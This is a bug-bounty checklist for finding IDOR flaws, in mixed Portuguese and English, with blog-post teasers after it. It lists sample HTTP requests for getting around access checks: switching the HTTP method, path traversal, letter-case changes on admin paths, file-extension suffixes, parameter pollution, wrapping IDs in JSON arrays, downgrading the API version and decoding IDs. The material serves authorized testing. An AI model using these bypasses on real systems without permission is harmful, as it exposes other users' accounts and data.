Lista de Verificação do IDOR

Etapas básicas:

1. Create two accounts if possible or else enumerate users first. 
2. Check if the endpoint is private or public and does it contains any kind of id param.
3. Try changing the param value to some other user and see if does anything to their account.
4. Done !!

try if you can idor to view image of any profille

[ ] conta de informações

[] VISUALIZAR, EXCLUIR e criar api_key

[ ] permite ler qualquer comentário

[ ] alterar preço

[ ] mudar a moeda de dólar para eur

[ ] Tente decodificar o ID, se o ID for codificado usando md5,base64,etc

GET /GetUser/dmljdGltQG1haWwuY29t
[...]

GET /users/delete/victim_id  ->403
POST /users/delete/victim_id ->200

Instead of this:
GET /api/albums?album_id=<album id>
Try This:
GET /api/albums?account_id=<account id>
Tip: There is a Burp extension called Paramalyzer which will help with this by remembering all the parameters you have passed to a host.

POST /users/delete/victim_id          ->403
POST /users/delete/my_id/..victim_id  ->200

Content-Type: application/xml ->
Content-Type: application/json

GET /file?id=90djbkdbkdbd29dd
GET /file?id=302

GET /admin/profile ->401
GET /Admin/profile ->200
GET /ADMIN/profile ->200
GET /aDmin/profile ->200
GET /adMin/profile ->200
GET /admIn/profile ->200
GET /admiN/profile ->200

GET /api/users/user_id ->
GET /api/users/*

for hashed ID ,create multiple accounts and understand the ppattern application users to allot an iD

search all the endpoints having ID which the search engine may have already indexed

use tools like arjun , paramminer

GET /api_v1/messages ->200
GET /api_v1/messages?user_id=victim_uuid ->200

GET /api_v1/messages?user_id=attacker_id&user_id=victim_id
GET /api_v1/messages?user_id=victim_id&user_id=attacker_id

GET /user_data/2341        -> 401
GET /user_data/2341.json   -> 200
GET /user_data/2341.xml    -> 200
GET /user_data/2341.config -> 200
GET /user_data/2341.txt    -> 200

{"userid":1234,"userid":2542}

{"userid":123} ->401
{"userid":[123]} ->200

{"userid":123} ->401
{"userid":{"userid":123}} ->200

GET /v3/users_data/1234 ->401
GET /v1/users_data/1234 ->200

GET /graphql
[...]
GET /graphql.php?query=
[...]

lógica de negócios , vulnerabilidade de registro , bypass 2fa , autenticação

Todas as listas de verificação neste repositório

https://github.com/Az0x7/vulnerability-Checklist

me seguindo

  • Linkedin , Twitter

Suggested posts

Jornada de um Script Writer (Desenvolvedor de Ferramentas)

Jornada de um Script Writer (Desenvolvedor de Ferramentas)

Comece a desenvolver sua própria ferramenta. Olá pessoal, Mais uma vez dou as boas vindas a todos vocês ao meu meio.

Um bug de cada vez: meu primeiro bug pago ($ 1.000 IDOR)

Um bug de cada vez: meu primeiro bug pago ($ 1.000 IDOR)

Olá a todos! Fico feliz em vê-lo de volta :) Hoje estarei escrevendo sobre meu primeiro bug pago, ele tem uma história engraçada, então continue lendo! Aqui está a arte da história de hoje por rez0 :) Então, vamos começar com como encontrei este IDOR 4. Exploit: Depois de enviado, fui redirecionado para um novo subdomínio que parecia extremamente antigo, isso despertou meu interesse por vários motivos: O novo subdomínio era algo como: http://link.

Related posts

Coletando OSINT para caçar ameaças

Coletando OSINT para caçar ameaças

Olá, entusiastas cibernéticos! Bem-vindo de volta ao OSINT para a série de caça a ameaças. No primeiro artigo, apresentei uma visão geral do OSINT e sua importância na caça às ameaças.

A arte é sempre apolítica?

A arte é sempre apolítica?

Ontem, fechamos a porta do Festival Eurovisão da Canção deste ano com uma brilhante e caótica grand finale, onde a cantora sueca Loreen levou para casa o troféu, tornando-se a primeira mulher a vencer duas vezes e trazendo a coroa de volta para a Suécia 50 anos depois que o ABBA venceu a competição com “Waterloo”. Eles se tornaram um dos maiores artistas do cânone da música pop.

That Threat Archive: Vol 7 Black Basta

That Threat Archive: Vol 7 Black Basta

No mundo interconectado de hoje, a ameaça de ataques cibernéticos é mais prevalente do que nunca. Criminosos cibernéticos e agentes de estado-nação estão constantemente buscando explorar vulnerabilidades e roubar dados valiosos, representando um risco significativo para organizações de todos os tamanhos.

Chega de senhas — como as senhas substituirão sua senha

Chega de senhas — como as senhas substituirão sua senha

Para evitar ambigüidade, os seguintes termos serão usados; Autenticador; O celular que está sendo utilizado para fazer o login no Site; O site ou aplicativo que o usuário está usando para fazer a solicitação de login do Serviço; O fornecedor que fornece o serviço fornecido, por exemplo